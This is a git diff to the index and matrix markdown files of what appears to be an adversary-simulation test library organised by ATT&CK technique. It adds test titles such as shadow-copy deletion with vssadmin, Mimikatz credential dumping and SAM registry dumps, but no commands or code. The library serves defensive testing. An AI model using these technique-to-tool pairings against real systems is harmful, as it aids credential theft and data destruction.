diff --git a/atomics/index.md b/atomics/index.md
index a10f1149..6de2b53b 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -90,7 +90,20 @@
   - Atomic Test #4: Disable SELinux
 - [T1211 Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1211/t1211.md)
 - [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md)
-- [T1107 File Deletion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1107/t1107.md)
+- [T1107 File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1107/t1107.md)
+  - Atomic Test #1: Victim configuration
+  - Atomic Test #2: Delete a single file
+  - Atomic Test #3: Delete an entire folder
+  - Atomic Test #4: Overwrite and delete a file with shred
+  - Atomic Test #5: Victim configuration
+  - Atomic Test #6: Delete a single file - cmd
+  - Atomic Test #7: Delete an entire folder - cmd
+  - Atomic Test #8: Delete a single file - ps
+  - Atomic Test #9: Delete an entire folder - ps
+  - Atomic Test #10: Delete VSS - vssadmin
+  - Atomic Test #11: Delete VSS - wmic
+  - Atomic Test #12: bcdedit
+  - Atomic Test #13: wbadmin
 - [T1006 File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1006/t1006.md)
 - [T1144 Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1144/t1144.md)
 - [T1148 HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1148/t1148.md)
@@ -121,7 +134,10 @@
 - [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1055/t1055.md)
 - [T1108 Redundant Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1108/t1108.md)
 - [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md)
-- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md)
+- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md)
+  - Atomic Test #1: Regsvr32 local COM scriptlet execution
+  - Atomic Test #2: Regsvr32 remote COM scriptlet execution
+  - Atomic Test #3: Regsvr32 local DLL execution
 - [T1014 Rootkit](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1014/t1014.md)
 - [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md)
 - [T1198 SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1198/t1198.md)
@@ -199,8 +215,13 @@
 - [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1098/t1098.md)
 - [T1139 Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1139/t1139.md)
   - Atomic Test #1: xxxx
-- [T1110 Brute Force](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1110/t1110.md)
-- [T1003 Credential Dumping](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1003/t1003.md)
+- [T1110 Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1110/t1110.md)
+  - Atomic Test #1: Brute Force Credentials
+- [T1003 Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1003/t1003.md)
+  - Atomic Test #1: Powershell Mimikatz
+  - Atomic Test #2: Gsecdump
+  - Atomic Test #3: Windows Credential Editor
+  - Atomic Test #4: Registry dump of SAM, creds, and secrets
 - [T1081 Credentials in Files](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1081/t1081.md)
 - [T1214 Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1214/t1214.md)
 - [T1212 Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1212/t1212.md)
@@ -235,7 +256,10 @@
 - [T1170 Mshta](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1170/t1170.md)
 - [T1086 PowerShell](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1086/t1086.md)
 - [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md)
-- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md)
+- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md)
+  - Atomic Test #1: Regsvr32 local COM scriptlet execution
+  - Atomic Test #2: Regsvr32 remote COM scriptlet execution
+  - Atomic Test #3: Regsvr32 local DLL execution
 - [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md)
 - [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md)
 - [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1064/t1064.md)
@@ -276,7 +300,9 @@
   - Atomic Test #1: SourceRecorder via Windows command prompt
   - Atomic Test #2: PowerShell Cmdlet via Windows command prompt
 - [T1119 Automated Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1119/t1119.md)
-- [T1115 Clipboard Data](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1115/t1115.md)
+- [T1115 Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1115/t1115.md)
+  - Atomic Test #1: Utilize Clipboard to store or execute commands from
+  - Atomic Test #2: PowerShell
 - [T1074 Data Staged](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1074/t1074.md)
 - [T1213 Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1213/t1213.md)
 - [T1005 Data from Local System](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1005/t1005.md)
@@ -285,12 +311,18 @@
 - [T1114 Email Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1114/t1114.md)
 - [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1056/t1056.md)
 - [T1185 Man in the Browser](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1185/t1185.md)
-- [T1113 Screen Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1113/t1113.md)
+- [T1113 Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1113/t1113.md)
+  - Atomic Test #1: Screencapture
+  - Atomic Test #2: Screencapture (silent)
+  - Atomic Test #3: X Windows Capture
+  - Atomic Test #4: Import
 - [T1125 Video Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1125/t1125.md)
 
 # exfiltration
 - [T1020 Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1020/t1020.md)
-- [T1002 Data Compressed](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1002/t1002.md)
+- [T1002 Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1002/t1002.md)
+  - Atomic Test #1: Compress Data for Exfiltration With PowerShell
+  - Atomic Test #2: Compress Data for Exfiltration With Rar
 - [T1022 Data Encrypted](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1022/t1022.md)
 - [T1030 Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1030/t1030.md)
 - [T1048 Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1048/t1048.md)
diff --git a/atomics/matrix.md b/atomics/matrix.md
index a2f234a6..c5d5c7b3 100644
--- a/atomics/matrix.md
+++ b/atomics/matrix.md
@@ -1,9 +1,9 @@
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | [Drive-by Compromise](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1189/t1189.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1155/t1155.md) | [.bash_profile and .bashrc](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1156/t1156.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1134/t1134.md) | [Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1134/t1134.md) | [Account Manipulation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1098/t1098.md) | [Account Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1087/t1087.md) | [AppleScript](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1155/t1155.md) | [Audio Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1123/t1123.md) | [Automated Exfiltration](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1020/t1020.md) | [Commonly Used Port](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1043/t1043.md) |
-| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1190/t1190.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1191/t1191.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1197/t1197.md) | [Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1139/t1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1010/t1010.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1017/t1017.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1119/t1119.md) | [Data Compressed](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1002/t1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1092/t1092.md) |
-| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1200/t1200.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1059/t1059.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1009/t1009.md) | [Brute Force](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1110/t1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1217/t1217.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1175/t1175.md) | [Clipboard Data](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1115/t1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1022/t1022.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1090/t1090.md) |
-| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1196/t1196.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1088/t1088.md) | [Credential Dumping](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1003/t1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1083/t1083.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1210/t1210.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1074/t1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1030/t1030.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1094/t1094.md) |
+| [Exploit Public-Facing Application](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1190/t1190.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1191/t1191.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [Accessibility Features](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1015/t1015.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1197/t1197.md) | [Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1139/t1139.md) | [Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1010/t1010.md) | [Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1017/t1017.md) | [Automated Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1119/t1119.md) | [Data Compressed](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1002/t1002.md) | [Communication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1092/t1092.md) |
+| [Hardware Additions](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1200/t1200.md) | [Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1059/t1059.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1182/t1182.md) | [Binary Padding](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1009/t1009.md) | [Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1110/t1110.md) | [Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1217/t1217.md) | [Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1175/t1175.md) | [Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1115/t1115.md) | [Data Encrypted](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1022/t1022.md) | [Connection Proxy](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1090/t1090.md) |
+| [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1196/t1196.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1103/t1103.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1088/t1088.md) | [Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1003/t1003.md) | [File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1083/t1083.md) | [Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1210/t1210.md) | [Data Staged](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1074/t1074.md) | [Data Transfer Size Limits](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1030/t1030.md) | [Custom Command and Control Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1094/t1094.md) |
 | [Spearphishing Attachment](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1193/t1193.md) | [Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1173/t1173.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1138/t1138.md) | [Application Shimming](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1138/t1138.md) | [CMSTP](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1191/t1191.md) | [Credentials in Files](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1081/t1081.md) | [Network Service Scanning](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1046/t1046.md) | [Logon Scripts](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1037/t1037.md) | [Data from Information Repositories](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1213/t1213.md) | [Exfiltration Over Alternative Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1048/t1048.md) | [Custom Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1024/t1024.md) |
 | [Spearphishing Link](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1192/t1192.md) | [Execution through API](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1106/t1106.md) | [Authentication Package](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1131/t1131.md) | [Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1088/t1088.md) | [Clear Command History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1146/t1146.md) | [Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1214/t1214.md) | [Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1135/t1135.md) | [Pass the Hash](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1075/t1075.md) | [Data from Local System](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1005/t1005.md) | [Exfiltration Over Command and Control Channel](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1041/t1041.md) | [Data Encoding](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1132/t1132.md) |
 | [Spearphishing via Service](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1194/t1194.md) | [Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1129/t1129.md) | [BITS Jobs](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1197/t1197.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Code Signing](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1116/t1116.md) | [Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1212/t1212.md) | [Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1201/t1201.md) | [Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1097/t1097.md) | [Data from Network Shared Drive](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1039/t1039.md) | [Exfiltration Over Other Network Medium](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1011/t1011.md) | [Data Obfuscation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1001/t1001.md) |
@@ -11,13 +11,13 @@
 | [Trusted Relationship](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1199/t1199.md) | [Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1061/t1061.md) | [Browser Extensions](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1176/t1176.md) | [Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1068/t1068.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1122/t1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1069/t1069.md) | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1105/t1105.md) | [Email Collection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1114/t1114.md) | [Scheduled Transfer](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1029/t1029.md) | [Fallback Channels](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1008/t1008.md) |
 | [Valid Accounts](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1078/t1078.md) | [InstallUtil](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1118/t1118.md) | [Change Default File Association](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1042/t1042.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) | [Control Panel Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1196/t1196.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1056/t1056.md) | [Process Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1057/t1057.md) | [Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1021/t1021.md) | [Input Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1056/t1056.md) |  | [Multi-Stage Channels](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1104/t1104.md) |
 |  | [LSASS Driver](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1177/t1177.md) | [Component Firmware](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1109/t1109.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1044/t1044.md) | [DCShadow](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1207/t1207.md) | [Input Prompt](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1141/t1141.md) | [Query Registry](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1012/t1012.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [Man in the Browser](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1185/t1185.md) |  | [Multi-hop Proxy](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1188/t1188.md) |
-|  | [Launchctl](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1152/t1152.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1122/t1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1208/t1208.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1018/t1018.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1184/t1184.md) | [Screen Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1113/t1113.md) |  | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1026/t1026.md) |
+|  | [Launchctl](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1152/t1152.md) | [Component Object Model Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1122/t1122.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Kerberoasting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1208/t1208.md) | [Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1018/t1018.md) | [SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1184/t1184.md) | [Screen Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1113/t1113.md) |  | [Multiband Communication](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1026/t1026.md) |
 |  | [Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1168/t1168.md) | [Create Account](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1136/t1136.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1183/t1183.md) | [DLL Side-Loading](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1073/t1073.md) | [Keychain](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1142/t1142.md) | [Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1063/t1063.md) | [Shared Webroot](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1051/t1051.md) | [Video Capture](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1125/t1125.md) |  | [Multilayer Encryption](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1079/t1079.md) |
 |  | [Mshta](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1170/t1170.md) | [DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1038/t1038.md) | [Launch Daemon](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1160/t1160.md) | [Deobfuscate/Decode Files or Information](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1140/t1140.md) | [LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1171/t1171.md) | [System Information Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1082/t1082.md) | [Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1080/t1080.md) |  |  | [Port Knocking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1205/t1205.md) |
 |  | [PowerShell](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1086/t1086.md) | [Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1157/t1157.md) | [New Service](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1050/t1050.md) | [Disabling Security Tools](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1089/t1089.md) | [Network Sniffing](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1040/t1040.md) | [System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1016/t1016.md) | [Third-party Software](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1072/t1072.md) |  |  | [Remote Access Tools](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1219/t1219.md) |
 |  | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1133/t1133.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1034/t1034.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1211/t1211.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1174/t1174.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1049/t1049.md) | [Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1077/t1077.md) |  |  | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1105/t1105.md) |
-|  | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1044/t1044.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1150/t1150.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1145/t1145.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1033/t1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1028/t1028.md) |  |  | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1071/t1071.md) |
-|  | [Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1158/t1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1013/t1013.md) | [File Deletion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1107/t1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1007/t1007.md) |  |  |  | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1032/t1032.md) |
